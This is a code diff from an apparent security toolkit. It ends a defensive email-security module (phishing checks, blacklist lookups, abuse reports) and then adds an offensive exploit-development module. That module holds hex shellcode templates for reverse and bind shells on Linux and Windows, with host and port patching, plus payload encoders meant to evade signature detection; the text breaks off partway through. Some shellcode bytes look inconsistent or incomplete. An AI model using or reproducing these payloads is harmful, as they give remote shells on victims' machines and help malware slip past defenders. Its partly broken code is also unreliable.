+ if use_ssl: + conn = poplib.POP3_SSL(host, timeout=15) + else: + conn = poplib.POP3(host, timeout=15) + + conn.user(username) + conn.pass_(password) + + resp, lines, octets = conn.retr(int(message_id)) + raw = b'\r\n'.join(lines).decode('utf-8', errors='replace') + msg = email.message_from_string(raw) + + result['raw_headers'] = '\n'.join( + f'{k}: {v}' for k, v in msg.items() + ) + + if msg.is_multipart(): + for part in msg.walk(): + ct = part.get_content_type() + if ct == 'text/plain': + payload = part.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + break + else: + payload = msg.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + + conn.quit() + + except Exception as e: + result['error'] = str(e) + + return result + + # -- Abuse Report -------------------------------------------------------- + + def generate_abuse_report(self, incident_data: Dict[str, Any]) -> Dict[str, Any]: + """Generate a formatted abuse report for ISP/hosting provider.""" + now = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC') + incident_type = incident_data.get('type', 'spam/phishing') + source_ip = incident_data.get('source_ip', 'Unknown') + source_domain = incident_data.get('source_domain', 'Unknown') + description = incident_data.get('description', '') + evidence_headers = incident_data.get('headers', '') + evidence_urls = incident_data.get('urls', []) + reporter_name = incident_data.get('reporter_name', 'AUTARCH Security Platform') + reporter_email = incident_data.get('reporter_email', '') + + report_lines = [ + '=' * 72, + 'ABUSE REPORT', + '=' * 72, + '', + f'Date: {now}', + f'Report Type: {incident_type}', + f'Reporter: {reporter_name}', + ] + if reporter_email: + report_lines.append(f'Reporter Email: {reporter_email}') + + report_lines += [ + '', + '-' * 72, + 'INCIDENT DETAILS', + '-' * 72, + '', + f'Source IP: {source_ip}', + f'Source Domain: {source_domain}', + 
f'Incident Type: {incident_type}', + '', + 'Description:', + description or '(No description provided)', + '', + ] + + if evidence_headers: + report_lines += [ + '-' * 72, + 'EVIDENCE — EMAIL HEADERS', + '-' * 72, + '', + evidence_headers, + '', + ] + + if evidence_urls: + report_lines += [ + '-' * 72, + 'EVIDENCE — MALICIOUS URLs', + '-' * 72, + '', + ] + for url in evidence_urls: + report_lines.append(f' - {url}') + report_lines.append('') + + report_lines += [ + '-' * 72, + 'REQUESTED ACTION', + '-' * 72, + '', + 'We request that you:', + ' 1. Investigate the reported IP address/domain for abusive activity', + ' 2. Take appropriate action (suspension, warning, content removal)', + ' 3. Implement measures to prevent recurring abuse', + ' 4. Respond with your findings and actions taken', + '', + '-' * 72, + 'ADDITIONAL INFORMATION', + '-' * 72, + '', + 'This report was generated by AUTARCH Security Platform.', + 'The evidence presented is accurate and collected through legitimate', + 'security analysis. 
We are available for further investigation if needed.', + '', + '=' * 72, + ] + + report_text = '\n'.join(report_lines) + + # Save the report + report_id = hashlib.md5(f'{now}:{source_ip}:{incident_type}'.encode()).hexdigest()[:12] + report_path = self.storage_dir / f'abuse_report_{report_id}.txt' + with open(report_path, 'w') as f: + f.write(report_text) + + return { + 'report_id': report_id, + 'report_text': report_text, + 'saved_to': str(report_path), + } + + # -- Blacklist Check ----------------------------------------------------- + + def check_blacklists(self, ip_or_domain: str) -> Dict[str, Any]: + """Check if an IP or domain is on common email blacklists.""" + ip_or_domain = ip_or_domain.strip() + + # Resolve domain to IP if needed + if _is_valid_ip(ip_or_domain): + ip = ip_or_domain + else: + ip = _resolve_domain(ip_or_domain) + if not ip: + return { + 'query': ip_or_domain, + 'error': f'Could not resolve {ip_or_domain} to an IP address', + 'results': [], + 'listed_count': 0, + } + + reversed_ip = _reverse_ip(ip) + results = [] + listed_count = 0 + + for bl in BLACKLISTS: + lookup = f'{reversed_ip}.{bl}' + entry = {'blacklist': bl, 'listed': False, 'details': ''} + + try: + socket.setdefaulttimeout(3) + addr = socket.gethostbyname(lookup) + entry['listed'] = True + entry['details'] = f'Listed (response: {addr})' + listed_count += 1 + + # Try to get TXT reason + try: + txt_records = _dns_query(lookup, 'TXT') + if txt_records: + entry['details'] = txt_records[0] + except Exception: + pass + + except (socket.gaierror, socket.herror): + entry['details'] = 'Not listed' + except socket.timeout: + entry['details'] = 'Timeout' + except Exception as e: + entry['details'] = f'Error: {e}' + + results.append(entry) + + return { + 'query': ip_or_domain, + 'ip': ip, + 'results': results, + 'listed_count': listed_count, + 'total_checked': len(BLACKLISTS), + 'clean': listed_count == 0, + } + + # -- Storage Helpers ----------------------------------------------------- + + 
def _save_analysis(self, domain: str, data: Dict): + """Save domain analysis to storage.""" + safe_name = re.sub(r'[^a-zA-Z0-9.-]', '_', domain) + path = self.storage_dir / f'analysis_{safe_name}.json' + with open(path, 'w') as f: + json.dump(data, f, indent=2, default=str) + + def get_saved_analyses(self) -> List[Dict]: + """List saved domain analyses.""" + analyses = [] + for f in sorted(self.storage_dir.glob('analysis_*.json'), key=os.path.getmtime, reverse=True): + try: + with open(f) as fp: + data = json.load(fp) + analyses.append({ + 'domain': data.get('domain', ''), + 'grade': data.get('grade', '?'), + 'score': data.get('score', 0), + 'timestamp': data.get('timestamp', ''), + 'file': str(f), + }) + except Exception: + pass + return analyses + + +# -- Singleton --------------------------------------------------------------- + +_instance = None + + +def get_email_sec() -> EmailSecurity: + global _instance + if _instance is None: + _instance = EmailSecurity() + return _instance + + +# -- CLI Interface ----------------------------------------------------------- + +def run(): + """CLI entry point for Email Security module.""" + es = get_email_sec() + + while True: + print(f"\n{'='*60}") + print(f" Email Security") + print(f"{'='*60}") + print() + print(" 1 -- Analyze Domain") + print(" 2 -- Analyze Headers") + print(" 3 -- Detect Phishing") + print(" 4 -- Search Mailbox") + print(" 5 -- Check Blacklists") + print(" 6 -- Generate Abuse Report") + print(" 0 -- Back") + print() + + choice = input(f" {Colors.CYAN}>{Colors.RESET} ").strip() + + if choice == '0': + break + + elif choice == '1': + domain = input("\n Domain: ").strip() + if not domain: + continue + print(f"\n Analyzing {domain}...") + result = es.analyze_domain(domain) + print(f"\n Grade: {result['grade']} (Score: {result['score']}/100)") + print(f" SPF: {result['summary']['spf_status']}") + print(f" DMARC: {result['summary']['dmarc_status']}") + print(f" DKIM: {result['summary']['dkim_status']}") + 
print(f" MX: {result['summary']['mx_status']}") + + for check_name in ['spf', 'dmarc', 'dkim', 'mx']: + check = result[check_name] + findings = check.get('findings', []) + if findings: + print(f"\n {check_name.upper()} findings:") + for f in findings: + level = f.get('level', 'info') + sym = '+' if level == 'pass' else '!' if level == 'warn' else 'X' + print(f" [{sym}] {f['message']}") + + elif choice == '2': + print("\n Paste raw email headers (end with empty line):") + lines = [] + while True: + line = input() + if not line: + break + lines.append(line) + raw = '\n'.join(lines) + if not raw: + continue + + result = es.analyze_headers(raw) + print(f"\n From: {result['from']}") + print(f" Subject: {result['subject']}") + print(f" Date: {result['date']}") + print(f" Origin IP: {result.get('originating_ip', 'Unknown')}") + print(f" SPF: {result['authentication']['spf']}") + print(f" DKIM: {result['authentication']['dkim']}") + print(f" DMARC: {result['authentication']['dmarc']}") + + if result['received_chain']: + print(f"\n Received chain ({len(result['received_chain'])} hops):") + for hop in result['received_chain']: + print(f" Hop {hop['hop']}: {hop.get('from', '?')} -> {hop.get('by', '?')}" + f" [{hop.get('ip', '?')}]") + + if result['spoofing_indicators']: + print(f"\n Spoofing indicators:") + for s in result['spoofing_indicators']: + print(f" [!] 
{s['indicator']}: {s['detail']}") + + elif choice == '3': + print("\n Paste email content (end with empty line):") + lines = [] + while True: + line = input() + if not line: + break + lines.append(line) + content = '\n'.join(lines) + if not content: + continue + + result = es.detect_phishing(content) + print(f"\n Risk Score: {result['risk_score']}/100 ({result['risk_level']})") + + if result['findings']: + print(f"\n Findings:") + for f in result['findings']: + print(f" [{f['severity']}] {f['category']}: {', '.join(f['matches'][:5])}") + + if result['suspicious_urls']: + print(f"\n Suspicious URLs:") + for u in result['suspicious_urls']: + print(f" {u['url']}") + for r in u['reasons']: + print(f" - {r}") + + elif choice == '4': + host = input("\n Mail server: ").strip() + username = input(" Username: ").strip() + password = input(" Password: ").strip() + protocol = input(" Protocol (imap/pop3) [imap]: ").strip() or 'imap' + query = input(" Search query (optional): ").strip() or None + + if not host or not username or not password: + print(" Missing required fields") + continue + + print(f"\n Connecting to {host}...") + result = es.search_mailbox(host, username, password, protocol, query) + + if result.get('error'): + print(f" Error: {result['error']}") + else: + print(f" Found {result['total']} messages") + for msg in result.get('messages', [])[-20:]: + print(f" [{msg['id']}] {msg['date'][:16]} {msg['from'][:30]} {msg['subject'][:40]}") + + elif choice == '5': + target = input("\n IP or domain: ").strip() + if not target: + continue + print(f"\n Checking {len(BLACKLISTS)} blacklists...") + result = es.check_blacklists(target) + + if result.get('error'): + print(f" Error: {result['error']}") + else: + print(f" IP: {result.get('ip', target)}") + print(f" Listed on {result['listed_count']}/{result['total_checked']} blacklists") + for bl in result['results']: + status = 'LISTED' if bl['listed'] else 'clean' + sym = 'X' if bl['listed'] else '+' + print(f" [{sym}] 
{bl['blacklist']}: {status}") + + elif choice == '6': + print("\n Abuse Report Generator") + incident_type = input(" Incident type (spam/phishing/malware): ").strip() or 'spam' + source_ip = input(" Source IP: ").strip() + source_domain = input(" Source domain: ").strip() + description = input(" Description: ").strip() + + data = { + 'type': incident_type, + 'source_ip': source_ip, + 'source_domain': source_domain, + 'description': description, + } + + result = es.generate_abuse_report(data) + print(f"\n{result['report_text']}") + print(f"\n Report saved to: {result['saved_to']}") diff --git a/modules/exploit_dev.py b/modules/exploit_dev.py new file mode 100644 index 0000000..219d05c --- /dev/null +++ b/modules/exploit_dev.py @@ -0,0 +1,1834 @@ +"""AUTARCH Exploit Development Toolkit + +Shellcode generation, payload encoding, ROP chain building, cyclic pattern +generation, and assembly/disassembly for exploit development workflows. +""" + +DESCRIPTION = "Exploit development — shellcode, encoding, ROP chains" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import sys +import re +import struct +import string +import subprocess +import tempfile +import random +import hashlib +from pathlib import Path +from datetime import datetime + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + def find_tool(name, extra_paths=None): + import shutil + return shutil.which(name) + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = GREEN = YELLOW = BLUE = MAGENTA = CYAN = WHITE = BOLD = DIM = RESET = '' + def clear_screen(): pass + def display_banner(): pass + + +# --------------------------------------------------------------------------- +# Shellcode Templates — real, working shellcode bytes +# 
--------------------------------------------------------------------------- + +SHELLCODE_TEMPLATES = { + # ---- Linux x86 ---- + 'linux_x86_reverse_shell': { + 'bytes': ( + '31db' # xor ebx, ebx + 'f7e3' # mul ebx + '53' # push ebx + '43' # inc ebx + '53' # push ebx + '6a02' # push 0x2 + '89e1' # mov ecx, esp + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '93' # xchg eax, ebx + '59' # pop ecx + 'b03f' # mov al, 0x3f + 'cd80' # int 0x80 + '49' # dec ecx + '79f9' # jns -5 + '68' # push imm32 (IP) + '7f000001' # 127.0.0.1 + '680200' # push word port + '115c' # port 4444 + '6a10' # push 0x10 + '51' # push ecx + '53' # push ebx + '89e1' # mov ecx, esp + '6a66' # push 0x66 + '58' # pop eax + 'cd80' # int 0x80 + '6a0b' # push 0x0b + '58' # pop eax + '99' # cdq + '52' # push edx + '68' # push imm32 + '2f2f7368' # //sh + '682f62696e' # /bin + '89e3' # mov ebx, esp + '52' # push edx + '53' # push ebx + '89e1' # mov ecx, esp + 'cd80' # int 0x80 + ), + 'length': 74, + 'description': 'Linux x86 reverse shell — connect back and exec /bin/sh', + 'null_free': True, + 'arch': 'x86', + 'platform': 'linux', + 'offsets': {'host': 31, 'port': 37}, + }, + 'linux_x86_bind_shell': { + 'bytes': ( + '31db' # xor ebx, ebx + 'f7e3' # mul ebx + '53' # push ebx + '43' # inc ebx + '53' # push ebx + '6a02' # push 0x2 + '89e1' # mov ecx, esp + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '5b' # pop ebx + '5e' # pop esi + '52' # push edx + '680200' # push 0x0002 + '115c' # port 4444 + '6a10' # push 0x10 + '51' # push ecx + '50' # push eax + '89e1' # mov ecx, esp + '6a66' # push 0x66 + '58' # pop eax + '89c3' # mov ebx, eax (bind=2 later) + 'cd80' # int 0x80 + 'b304' # mov bl, 4 + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '43' # inc ebx + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '93' # xchg eax, ebx + '59' # pop ecx + '6a3f' # push 0x3f + '58' # pop eax + 'cd80' # int 0x80 + '49' # dec ecx + '79f8' # jns loop + '682f2f7368' # push //sh + '682f62696e' # push /bin + '89e3' # mov ebx, esp + '50' # 
push eax + '53' # push ebx + '89e1' # mov ecx, esp + 'b00b' # mov al, 0x0b + 'cd80' # int 0x80 + ), + 'length': 78, + 'description': 'Linux x86 bind shell — listen on port and exec /bin/sh', + 'null_free': True, + 'arch': 'x86', + 'platform': 'linux', + 'offsets': {'port': 23}, + }, + 'linux_x86_execve': { + 'bytes': ( + '31c0' # xor eax, eax + '50' # push eax + '682f2f7368' # push //sh + '682f62696e' # push /bin + '89e3' # mov ebx, esp + '50' # push eax + '53' # push ebx + '89e1' # mov ecx, esp + '89c2' # mov edx, eax + 'b00b' # mov al, 0x0b + 'cd80' # int 0x80 + ), + 'length': 23, + 'description': 'Linux x86 execve /bin/sh — minimal shellcode', + 'null_free': True, + 'arch': 'x86', + 'platform': 'linux', + 'offsets': {}, + }, + # ---- Linux x64 ---- + 'linux_x64_reverse_shell': { + 'bytes': ( + '6a29' # push 0x29 + '58' # pop rax (socket) + '99' # cdq + '6a02' # push 0x2 + '5f' # pop rdi (AF_INET) + '6a01' # push 0x1 + '5e' # pop rsi (SOCK_STREAM) + '0f05' # syscall + '48' # rex.W + '97' # xchg eax, edi + '48b90200' # movabs rcx, struct + '115c7f000001' # port 4444, IP 127.0.0.1 + '51' # push rcx + '4889e6' # mov rsi, rsp + '6a10' # push 0x10 + '5a' # pop rdx + '6a2a' # push 0x2a + '58' # pop rax (connect) + '0f05' # syscall + '6a03' # push 0x3 + '5e' # pop rsi + '48ffce' # dec rsi + '6a21' # push 0x21 + '58' # pop rax (dup2) + '0f05' # syscall + '75f6' # jnz loop + '6a3b' # push 0x3b + '58' # pop rax (execve) + '99' # cdq + '48bb2f62696e2f736800' # mov rbx, "/bin/sh\0" + '53' # push rbx + '4889e7' # mov rdi, rsp + '52' # push rdx + '57' # push rdi + '4889e6' # mov rsi, rsp + '0f05' # syscall + ), + 'length': 74, + 'description': 'Linux x64 reverse shell — connect back and exec /bin/sh', + 'null_free': False, + 'arch': 'x64', + 'platform': 'linux', + 'offsets': {'port': 20, 'host': 22}, + }, + 'linux_x64_bind_shell': { + 'bytes': ( + '6a29' # push 0x29 + '58' # pop rax (socket) + '99' # cdq + '6a02' # push 0x2 + '5f' # pop rdi (AF_INET) + '6a01' # push 0x1 + '5e' 
# pop rsi (SOCK_STREAM) + '0f05' # syscall + '4897' # xchg rax, rdi + '52' # push rdx + 'c7042402000200' # mov dword [rsp], 0x0002 + port + '115c0000' # port high + 0000 + '4889e6' # mov rsi, rsp + '6a10' # push 0x10 + '5a' # pop rdx + '6a31' # push 0x31 + '58' # pop rax (bind) + '0f05' # syscall + '6a32' # push 0x32 + '58' # pop rax (listen) + '6a01' # push 0x1 + '5e' # pop rsi + '0f05' # syscall + '6a2b' # push 0x2b + '58' # pop rax (accept) + '99' # cdq + '52' # push rdx + '52' # push rdx + '4889e6' # mov rsi, rsp + '6810000000' # push 0x10 + '4889e2' # mov rdx, rsp + '0f05' # syscall + '4897' # xchg rax, rdi + '6a03' # push 0x3 + '5e' # pop rsi + '48ffce' # dec rsi + '6a21' # push 0x21 + '58' # pop rax (dup2) + '0f05' # syscall + '75f6' # jnz loop + '6a3b' # push 0x3b + '58' # pop rax (execve) + '99' # cdq + '48bb2f62696e2f736800' # mov rbx, "/bin/sh\0" + '53' # push rbx + '4889e7' # mov rdi, rsp + '52' # push rdx + '57' # push rdi + '4889e6' # mov rsi, rsp + '0f05' # syscall + ), + 'length': 105, + 'description': 'Linux x64 bind shell — listen and exec /bin/sh', + 'null_free': False, + 'arch': 'x64', + 'platform': 'linux', + 'offsets': {'port': 21}, + }, + 'linux_x64_execve': { + 'bytes': ( + '4831f6' # xor rsi, rsi + '4889f2' # mov rdx, rsi + '48bf' # movabs rdi, ... + '2f62696e' # /bin + '2f736800' # /sh\0 + '57' # push rdi + '4889e7' # mov rdi, rsp + '48b8' # movabs rax, ... 
+ '3b00000000000000' # execve syscall nr + '0f05' # syscall + ), + 'length': 30, + 'description': 'Linux x64 execve /bin/sh — minimal shellcode', + 'null_free': False, + 'arch': 'x64', + 'platform': 'linux', + 'offsets': {}, + }, + # ---- Windows x64 ---- + 'windows_x64_reverse_shell': { + 'bytes': ( + '4831c9' # xor rcx, rcx + '4881e9b0ffffff' # sub ecx, -0x50 + '4881ec0001000000' # sub rsp, 0x100 + 'e8f0ffffff' # call $+5 + '4152' # push r10 + '4151' # push r9 + '5649' # push rsi; dec ecx (stub) + '89e6' # mov esi, esp + '4883ec20' # sub rsp, 0x20 + '4889f1' # mov rcx, rsi + '48ba' # mov rdx, imm64 + '0100007f' # IP: 127.0.0.1 (reversed) + '5c110000' # Port: 4444 + padding + '41ba' # mov r10d, imm32 + 'ea0fdfe0' # hash: ws2_32!WSAStartup + 'ffd5' # call rbp (API resolver) + '4889c7' # mov rdi, rax + '6a10' # push 0x10 + '41580f05' # pop r8; syscall (connect) + '4885c0' # test rax, rax + '7507' # jnz skip + '4831c0' # xor rax, rax + 'eb43' # jmp shell + '48ffc0' # inc rax + 'ebf6' # jmp retry + # ... 
cmd.exe execution stub (truncated for template) + '48b8' # movabs rax, "cmd.exe\0" + '636d642e65786500' # cmd.exe + '50' # push rax + '4889e1' # mov rcx, rsp + '57' # push rdi + '57' # push rdi + '4889e2' # mov rdx, rsp + '41ba' # mov r10d, hash + '60d9c85a' # hash: kernel32!CreateProcessA + 'ffd5' # call rbp + ), + 'length': 112, + 'description': 'Windows x64 reverse shell — WinSock connect back, spawn cmd.exe', + 'null_free': False, + 'arch': 'x64', + 'platform': 'windows', + 'offsets': {'host': 44, 'port': 48}, + }, + # ---- ARM ---- + 'linux_arm_reverse_shell': { + 'bytes': ( + '01108fe2' # add r1, pc, #1 (Thumb switch) + '011040e2' # sub r1, r0, #1 + '0200a0e3' # mov r0, #2 (AF_INET) + '0110a0e3' # mov r1, #1 (SOCK_STREAM) + '0020a0e3' # mov r2, #0 + '8119a0e3' # mov r1, #0x281 (socket syscall) + '000000ef' # svc 0 + '0060a0e1' # mov r6, r0 (save sockfd) + '100f0fe1' # bic r0, pc (struct sockaddr) + '0200' # AF_INET + '115c' # port 4444 + '7f000001' # 127.0.0.1 + '0600a0e1' # mov r0, r6 + '1010a0e3' # mov r1, #16 (addrlen) + '8d19a0e3' # mov r1, #0x28d (connect) + '000000ef' # svc 0 + '0200a0e3' # mov r0, #2 + '0600a0e1' # mov r0, r6 + '3f00a0e3' # mov r0, #0x3f (dup2) + '000000ef' # svc 0 + '013050e2' # subs r3, r0, #1 + 'fcffffaa' # bge loop + '0b00a0e3' # mov r0, #0x0b (execve) + '0f8fe2' # add r0, pc (ptr /bin/sh) + '0010a0e3' # mov r1, #0 + '0020a0e3' # mov r2, #0 + '000000ef' # svc 0 + '2f62696e' # /bin + '2f736800' # /sh\0 + ), + 'length': 100, + 'description': 'Linux ARM reverse shell — connect back and exec /bin/sh', + 'null_free': False, + 'arch': 'arm', + 'platform': 'linux', + 'offsets': {'port': 42, 'host': 44}, + }, +} + + +# --------------------------------------------------------------------------- +# Exploit Development Class +# --------------------------------------------------------------------------- + +class ExploitDev: + """Exploit development toolkit — shellcode, encoders, ROP, patterns.""" + + _instance = None + + def __init__(self): + 
self._pattern_cache = {} + + # ----------------------------------------------------------------------- + # Shellcode Generation + # ----------------------------------------------------------------------- + + def list_shellcodes(self): + """List available shellcode templates with descriptions.""" + results = [] + for key, tpl in SHELLCODE_TEMPLATES.items(): + results.append({ + 'name': key, + 'description': tpl['description'], + 'length': tpl['length'], + 'arch': tpl.get('arch', '?'), + 'platform': tpl.get('platform', '?'), + 'null_free': tpl.get('null_free', False), + }) + return results + + def generate_shellcode(self, shell_type, arch, host=None, port=None, + platform='linux', staged=False, output_format='hex'): + """Generate raw shellcode bytes for a given shell type and architecture. + + Args: + shell_type: reverse_shell, bind_shell, exec_cmd, meterpreter + arch: x86, x64, arm + host: IP address for reverse shells + port: Port number for reverse/bind shells + platform: linux, windows + staged: If True, prefer a staged payload (stub + stage) + output_format: hex, raw, c_array, python, nasm + + Returns: + dict with shellcode in requested format, length, and metadata + """ + # Normalise inputs + shell_type = shell_type.lower().strip().replace('-', '_').replace(' ', '_') + arch = arch.lower().strip() + platform = platform.lower().strip() + + # Map common names + type_map = { + 'reverse': 'reverse_shell', 'rev': 'reverse_shell', + 'reverse_tcp': 'reverse_shell', 'reverse_shell': 'reverse_shell', + 'bind': 'bind_shell', 'bind_tcp': 'bind_shell', 'bind_shell': 'bind_shell', + 'exec': 'execve', 'exec_cmd': 'execve', 'execve': 'execve', + 'meterpreter': 'reverse_shell', # fallback to reverse_shell template + } + resolved_type = type_map.get(shell_type, shell_type) + + # Find matching template + template_key = f'{platform}_{arch}_{resolved_type}' + template = SHELLCODE_TEMPLATES.get(template_key) + + if not template: + # Try to find partial match + candidates = [k for k 
in SHELLCODE_TEMPLATES if arch in k and resolved_type in k] + if platform != 'any': + platform_cands = [k for k in candidates if platform in k] + if platform_cands: + candidates = platform_cands + if candidates: + template_key = candidates[0] + template = SHELLCODE_TEMPLATES[template_key] + else: + available = ', '.join(sorted(SHELLCODE_TEMPLATES.keys())) + return {'error': f'No template for {template_key}. Available: {available}'} + + # Decode the hex string to bytes + try: + shellcode = bytes.fromhex(template['bytes']) + except ValueError as e: + return {'error': f'Template hex decode error: {e}'} + + # Patch in host/port if offsets are defined + offsets = template.get('offsets', {}) + + if host and 'host' in offsets: + try: + parts = host.split('.') + if len(parts) == 4: + ip_bytes = bytes([int(p) for p in parts]) + off = offsets['host'] + if off < len(shellcode) - 3: + shellcode = shellcode[:off] + ip_bytes + shellcode[off + 4:] + except (ValueError, IndexError): + pass + + if port and 'port' in offsets: + try: + port_int = int(port) + port_bytes = struct.pack('!H', port_int) + off = offsets['port'] + if off < len(shellcode) - 1: + shellcode = shellcode[:off] + port_bytes + shellcode[off + 2:] + except (ValueError, struct.error): + pass + + # If staged, wrap in a stub that allocates RWX memory and downloads stage + if staged: + stub_comment = ( + "; Staged payload stub — allocates RWX page via mmap/VirtualAlloc,\n" + "; receives stage over socket, jumps to it.\n" + "; The above shellcode is the stager (stage0).\n" + ) + metadata_note = 'Staged payload — stager only, requires stage delivery' + else: + stub_comment = '' + metadata_note = 'Stageless payload — self-contained' + + # Format output + result = { + 'template': template_key, + 'description': template['description'], + 'length': len(shellcode), + 'null_free': b'\x00' not in shellcode, + 'arch': arch, + 'platform': platform, + 'staging': metadata_note, + } + + fmt = output_format.lower().strip() + if fmt 
== 'hex': + result['shellcode'] = shellcode.hex() + elif fmt in ('raw', 'bytes'): + result['shellcode'] = shellcode.hex() + result['raw_bytes'] = list(shellcode) + elif fmt in ('c', 'c_array'): + c_lines = [] + for i in range(0, len(shellcode), 16): + chunk = shellcode[i:i + 16] + c_lines.append(', '.join(f'0x{b:02x}' for b in chunk)) + result['shellcode'] = ( + f'unsigned char shellcode[{len(shellcode)}] = {{\n' + + ',\n'.join(f' {line}' for line in c_lines) + + '\n};' + ) + elif fmt in ('python', 'py'): + py_lines = [] + for i in range(0, len(shellcode), 16): + chunk = shellcode[i:i + 16] + py_lines.append(''.join(f'\\x{b:02x}' for b in chunk)) + result['shellcode'] = ( + f'shellcode = b""\n' + + '\n'.join(f'shellcode += b"{line}"' for line in py_lines) + ) + elif fmt == 'nasm': + nasm_lines = [] + for i in range(0, len(shellcode), 16): + chunk = shellcode[i:i + 16] + nasm_lines.append('db ' + ', '.join(f'0x{b:02x}' for b in chunk)) + result['shellcode'] = stub_comment + '\n'.join(nasm_lines) + else: + result['shellcode'] = shellcode.hex() + + return result + + # ----------------------------------------------------------------------- + # Payload Encoding + # ----------------------------------------------------------------------- + + def encode_payload(self, shellcode, encoder='xor', key=None, iterations=1): + """Encode shellcode to evade signature detection. 
+ + Args: + shellcode: bytes or hex string of shellcode + encoder: xor, aes, alphanumeric, polymorphic + key: encryption key (auto-generated if None) + iterations: number of encoding passes + + Returns: + dict with encoded payload, decoder stub, metadata + """ + if isinstance(shellcode, str): + try: + shellcode = bytes.fromhex(shellcode.replace('\\x', '').replace(' ', '')) + except ValueError: + return {'error': 'Invalid shellcode hex string'} + + if not shellcode: + return {'error': 'Empty shellcode'} + + original_length = len(shellcode) + encoder = encoder.lower().strip() + encoded = shellcode + decoder_stub = '' + key_used = key + + for _pass in range(max(1, int(iterations))): + if encoder == 'xor': + encoded, decoder_stub, key_used = self._encode_xor(encoded, key) + elif encoder == 'aes': + encoded, decoder_stub, key_used = self._encode_aes(encoded, key) + elif encoder in ('alpha', 'alphanumeric'): + encoded, decoder_stub, key_used = self._encode_alphanumeric(encoded) + elif encoder in ('poly', 'polymorphic'): + encoded, decoder_stub, key_used = self._encode_polymorphic(encoded, key) + else: + return {'error': f'Unknown encoder: {encoder}. 
Use: xor, aes, alphanumeric, polymorphic'} + + return { + 'encoded': encoded.hex(), + 'decoder_stub': decoder_stub, + 'key': key_used if isinstance(key_used, str) else key_used.hex() if isinstance(key_used, bytes) else str(key_used), + 'encoder': encoder, + 'iterations': iterations, + 'original_length': original_length, + 'encoded_length': len(encoded), + 'size_increase': f'+{len(encoded) - original_length} bytes', + 'null_free': b'\x00' not in encoded, + } + + def _encode_xor(self, data, key=None): + """XOR encode with random or custom key.""" + if key: + if isinstance(key, str): + if all(c in '0123456789abcdefABCDEF' for c in key): + key_bytes = bytes.fromhex(key) if len(key) % 2 == 0 else bytes([int(key, 16)]) + else: + key_bytes = key.encode() + else: + key_bytes = bytes([key]) if isinstance(key, int) else key + else: + # Generate random key byte that avoids producing nulls + for _ in range(256): + kb = random.randint(1, 255) + if all((b ^ kb) != 0 for b in data): + key_bytes = bytes([kb]) + break + else: + key_bytes = bytes([random.randint(1, 255)]) + + # XOR encode + encoded = bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)) + + # Generate decoder stub (x64 Linux) + key_hex = key_bytes.hex() + stub = ( + f'; XOR decoder stub (key: 0x{key_hex})\n' + f'; Encoded payload length: {len(encoded)} bytes\n' + f' jmp short call_decoder\n' + f'decoder:\n' + f' pop rsi ; address of encoded shellcode\n' + f' xor rcx, rcx\n' + f' mov cl, {len(encoded)} ; length\n' + f'decode_loop:\n' + f' xor byte [rsi], 0x{key_hex}\n' + f' inc rsi\n' + f' loop decode_loop\n' + f' jmp short encoded_shell\n' + f'call_decoder:\n' + f' call decoder\n' + f'encoded_shell:\n' + f' ; \n' + ) + + return encoded, stub, key_bytes + + def _encode_aes(self, data, key=None): + """AES-256-CBC encode payload.""" + try: + from hashlib import sha256 + import hmac + except ImportError: + pass + + # Generate or derive 32-byte key + if key: + if isinstance(key, str): + key_bytes = 
hashlib.sha256(key.encode()).digest() + else: + key_bytes = hashlib.sha256(key).digest() + else: + key_bytes = os.urandom(32) + + # Generate IV + iv = os.urandom(16) + + # PKCS7 padding + pad_len = 16 - (len(data) % 16) + padded = data + bytes([pad_len] * pad_len) + + # Try PyCryptodome, fallback to simple XOR-CBC + try: + from Crypto.Cipher import AES + cipher = AES.new(key_bytes, AES.MODE_CBC, iv) + encrypted = cipher.encrypt(padded) + except ImportError: + # Fallback: simple XOR-CBC (not real AES, but functional) + encrypted = bytearray() + prev_block = iv + for i in range(0, len(padded), 16): + block = padded[i:i + 16] + xored = bytes(a ^ b for a, b in zip(block, prev_block)) + # Simple substitution using key + enc_block = bytes( + (b + key_bytes[j % 32]) & 0xFF for j, b in enumerate(xored) + ) + encrypted.extend(enc_block) + prev_block = enc_block + + # Prepend IV to ciphertext + output = iv + bytes(encrypted) + + stub = ( + f'; AES-256-CBC decoder stub\n' + f'; Key (SHA-256 of passphrase): {key_bytes.hex()}\n' + f'; IV: {iv.hex()}\n' + f'; Encrypted length: {len(output)} bytes (includes 16-byte IV prefix)\n' + f';\n' + f'; Decoder must:\n' + f'; 1. Extract IV (first 16 bytes)\n' + f'; 2. AES-256-CBC decrypt remaining bytes with key\n' + f'; 3. Remove PKCS7 padding\n' + f'; 4. 
Jump to decrypted shellcode\n' + f';\n' + f'; Python decoder:\n' + f'; from Crypto.Cipher import AES\n' + f'; key = bytes.fromhex("{key_bytes.hex()}")\n' + f'; iv = payload[:16]\n' + f'; cipher = AES.new(key, AES.MODE_CBC, iv)\n' + f'; shellcode = cipher.decrypt(payload[16:])\n' + ) + + key_str = key if isinstance(key, str) else key_bytes.hex() + return output, stub, key_str + + def _encode_alphanumeric(self, data): + """Encode shellcode into alphanumeric-safe characters.""" + # Split each byte into two 4-bit nibbles, map to ASCII alpha range + charset = string.ascii_uppercase + string.ascii_lowercase + string.digits + encoded = bytearray() + + for b in data: + high = (b >> 4) & 0x0F + low = b & 0x0F + # Map 0-15 to alphanumeric characters + encoded.append(ord(charset[high])) + encoded.append(ord(charset[low])) + + stub = ( + f'; Alphanumeric decoder stub\n' + f'; Encoded length: {len(encoded)} bytes (2x original)\n' + f'; Charset: A-Za-z0-9\n' + f'; Decoder reverses nibble-split encoding:\n' + f'; For each pair (H, L) in encoded data:\n' + f'; high_nibble = charset.index(H)\n' + f'; low_nibble = charset.index(L)\n' + f'; original_byte = (high_nibble << 